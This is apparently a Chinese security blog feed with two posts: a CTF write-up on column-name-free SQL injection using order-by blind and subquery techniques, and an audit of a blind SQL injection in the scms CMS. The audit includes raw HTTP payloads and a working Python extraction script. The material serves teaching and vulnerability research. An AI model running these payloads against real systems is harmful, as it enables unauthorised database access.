盲注 – ChaBug安全 / 一个分享知识、结识伙伴、资源共享的博客 Fri, 23 Aug 2019 01:15:53 +0000 zh-CN hourly 1 https://wordpress.org/?v=5.5.5 一道题引发的无列名注入 /ctf/852.html Thu, 22 Aug 2019 14:37:20 +0000 /?p=852 / @Syst1m的考核题

题目地址 http://152.136.179.79:18084/ 传入id=3为flag的id。

常规联合查询注入

http://152.136.179.79:18084/?id=3 union select 1,2,3

三个字段

http://152.136.179.79:18084/?id=3 union select 1,2,(select table_name from information_schema.tables where table_schema=database())

拿到flag所在的表,继续查列名

http://152.136.179.79:18084/?id=3 union select 1,2,(select column_name from information_schema.columns where table_name='this_1s_th3_fiag_tab13')

死活查不出来,应该是过滤了column关键字,没有列名怎么查出来数据呢???

有两种方法
1. order by盲注
2. 子查询

本地测试建表

20190822205338

20190822205621

order by盲注

order by用于根据指定的列对结果集进行排序。一般上是从0-9a-z这样排序,不区分大小写。

先来本地测试一下

20190822210044

可以看到我们构造的数据排在了第一行

20190822210124

仍然在第一行

20190822210155

当拿’q’和’pass’做比较时,我们构造的数据被排在了第二行。由此可以来根据不同的回显来逐位判断。

拿我们这道题来说

20190822210915

1的时候我们的数据在前

20190822210948

2的时候原始数据在前,说明第一位是1

然后判断第二位

20190822211104

1a的时候我们的数据在前

20190822211144

1b的时候原始数据在前,说明第二位是1a

由此逐位判断。

子查询

在无列名的情况下,用子查询可以很简单的将数据跑出来。

子查询是将一个查询语句嵌套在另一个查询语句中。在特定情况下,一个查询语句的条件需要另一个查询语句来获取,内层查询(inner query)语句的查询结果,可以为外层查询(outer query)语句提供查询条件。

20190822214132

这个语句将列名转换为了1,2,3,这个时候列名就已知了,我们可以用子查询将数据归并。

20190822214824

此时就能查出来数据了,然后我们再来看这个题。

我们已知了表名为this_1s_th3_fiag_tab13,但是不知道这个表有几个字段

20190822220530

可以用联合查询的方式来判断字段数。

查出数据

20190822220706

拿到我们这个题里来

20190822220930

payload

http://152.136.179.79:18084/?id=3 union select 1,2,x.2 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from this_1s_th3_fiag_tab13)x

子查询真是个好东西👍

写在文后

本文介绍了两种无列名注入的方式,很巧妙的在没有列名的情况下查出来数据,在实际利用中更推荐用子查询的方式,毕竟盲注有可能费力不讨好。

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。

]]> scms企业建站系统盲注 /audit/673.html /audit/673.html#comments Tue, 16 Jul 2019 05:32:43 +0000 /?p=673 闲着无聊,看到cnvd上昨天爆出来一个scms注入,今天分析一下。

E:\code\php\scms\js\scms.php:173

case "jssdk":
    $APPID = $C_wx_appid;
    $APPSECRET = $C_wx_appsecret;
    $info = getbody("https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=" . $APPID . "&secret=" . $APPSECRET, "");
    $access_token = json_decode($info)->access_token;
    $info = getbody("https://api.weixin.qq.com/cgi-bin/ticket/getticket?access_token=" . $access_token . "&type=jsapi", "");
    $ticket = json_decode($info)->ticket;
    $url = $_POST["url"];
    $noncestr = gen_key(20);
    $timestamp = time();
    $pageid = $_POST["pageid"];
    if ($pageid == "") {
        $pageid = 1;
    }
    switch ($_POST["pagetype"]) {
        case "index":
            $img = $C_ico;
            break;
        case "text":
            $img = getrs("select * from " . TABLE . "text where T_id=" . $pageid, "T_pic");
            break;
        case "product":
            $img = getrs("select * from " . TABLE . "psort where S_id=" . $pageid, "S_pic");
            break;
        case "productinfo":
            $img = splitx(getrs("select * from " . TABLE . "product where P_id=" . $pageid, "P_path"), "__", 0);
            break;
        case "news":
            $img = getrs("select * from " . TABLE . "nsort where S_id=" . $pageid, "S_pic");
            break;
        case "newsinfo":
            $img = getrs("select * from " . TABLE . "news where N_id=" . $pageid, "N_pic");
            break;
        case "form":
            $img = getrs("select * from " . TABLE . "form where F_id=" . $pageid, "F_pic");
            break;
        case "contact":
            $img = $C_ico;
            break;
        case "guestbook":
            $img = $C_ico;
            break;
    }

    $sign = sha1("jsapi_ticket=" . $ticket . "&noncestr=" . $noncestr . "×tamp=" . $timestamp . "&url=" . $url);

    echo "{\"nonceStr\":\"" . $noncestr . "\",\"timestamp\":\"" . $timestamp . "\",\"signature\":\"" . $sign . "\",\"appid\":\"" . $APPID . "\",\"img\":\"http://" . $_SERVER["HTTP_HOST"] . $C_dir . $img . "\",\"ticket\":\"" . $ticket . "\"}";


    break;

可以看到$pageid = $_POST["pageid"];直接从POST中赋值,并且直接拼接到sql语句中。

过滤了一些东西,在这我给出一个payload

首先先判断pageid是否存在

POST /js/scms.php?action=jssdk HTTP/1.1
Host: php.local
Content-Length: 30
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Origin: http://php.local/
Content-Type: application/x-www-form-urlencoded
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://php.local/js/scms.php?action=jssdk
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: Ov1T_2132_saltkey=WKW5M101; Ov1T_2132_lastvisit=1562845214; PHPSESSID=erjg0os8p6mcdbjm7ug5b3qn34; XDEBUG_SESSION=PHPSTORM
Connection: close

pagetype=productinfo&pageid=78

如果存在返回包应该是包含了img字段并且有具体的图片地址,例如

{"nonceStr":"merxK0Nu9iDC89zy4hGa","timestamp":"1563254507","signature":"5a8ed288f82d8292c5372636a57c43461dac8104","appid":"wxXXXXXXXXXX","img":"http://php.local/media/20151019120842158.jpg","ticket":""}

如果你的pageid是不存在的话,你的sleep时间将会是5的倍数

可以参考admintony师傅的文章MySQL的逻辑运算符(and_or_xor)的工作机制研究

给出payload

POST /js/scms.php?action=jssdk HTTP/1.1
Host: php.local
Content-Length: 89
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Origin: http://php.local/
Content-Type: application/x-www-form-urlencoded
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://php.local/js/scms.php?action=jssdk
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: Ov1T_2132_saltkey=WKW5M101; Ov1T_2132_lastvisit=1562845214; PHPSESSID=erjg0os8p6mcdbjm7ug5b3qn34; XDEBUG_SESSION=PHPSTORM
Connection: close

pagetype=productinfo&pageid=78 %26%26 if(ascii(substring(database(),1,1))=115,sleep(5),1)

值得一提的是scms过滤了一系列关键字比如select update ' /* \,那么具体的payload就靠大家发挥了
在这提供一个poc

POC代码如下:
import requests
import urllib.parse

chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_0123456789'

url='http://local/js/scms.php'

def getDatabaseLength():
    print('开始爆破数据库长度。。。')
    for i in range(10):
        payload="1%0Aand%0Aif(length(database())>{},1,0)#".format(i)
        payload=urllib.parse.unquote(payload)
        data = {
            'action':'jssdk',
            'pagetype':'text',
            'pageid':payload
        }
        # print(data)
        # data = urllib.parse.unquote(data)
        # print(data)
        rs = requests.post(url=url,data=data)
        rs.encode='utf-8'
        # print(rs.text)
        if "20151019102732946.jpg" not in rs.text:
            print("数据库名的长度为:{}".format(i))
            return i

def getDatabaseName():
    print('开始获取数据库名')
    databasename = ''

    length = getDatabaseLength()
    # length = 4
    for i in range(1,length+1):
        for c in chars:
            payload='1%0Aand%0Aif(ascii(substr(database(),{},1))={},1,0)#'.format(i,ord(c))
            # print(payload)
            payload = urllib.parse.unquote(payload)
            data = {
                'action': 'jssdk',
                'pagetype': 'text',
                'pageid': payload
            }
            rs = requests.post(url=url, data=data)
            rs.encode = 'utf-8'
            # print(rs.text)
            if "20151019102732946.jpg" in rs.text:
                databasename = databasename+c
                print(databasename)

    return databasename
getDatabaseName()

总的来说应该也算一个运气洞了

]]> /audit/673.html/feed 1